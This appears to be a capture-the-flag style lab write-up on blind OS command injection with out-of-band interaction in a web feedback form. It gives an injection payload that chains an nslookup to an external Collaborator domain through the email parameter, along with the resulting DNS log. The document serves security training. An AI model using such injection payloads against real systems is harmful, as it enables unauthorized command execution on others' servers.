Blind OS command injection with out-of-band interaction

Description

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that is accessible. However, it is possible to trigger out-of-band interactions with an external domain.

Reproduction and proof of concept

  1. Use Burp Suite to intercept and modify the request that submits feedback.

  2. Go to the Collaborator tab and click Copy to clipboard to copy a unique Burp Collaborator payload to your clipboard.

  3. In Repeater, modify the email parameter, changing it to something like: email=x||nslookup+x.xnoboj2tlk2af759ugfh7f66fxlo9fx4.oastify.com||

  4. Send.

  5. In Collaborator, click Poll now, and view the Description:

The Collaborator server received a DNS lookup of type A for the domain name x.xnoboj2tlk2af759ugfh7f66fxlo9fx4.oastify.com.  The lookup was received from IP address 3.251.128.130:39343 at 2023-Feb-04 14:29:35.231 UTC

Exploitability

An attacker will need to exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator. Note: To prevent the Academy platform being used to attack third parties, the firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, use Burp Collaborator’s default public server.

_Note: The solution described here is sufficient simply to trigger a DNS lookup and so solve the lab. In a real-world situation, you would use Burp Collaborator client to verify that your payload had indeed triggered a DNS lookup. _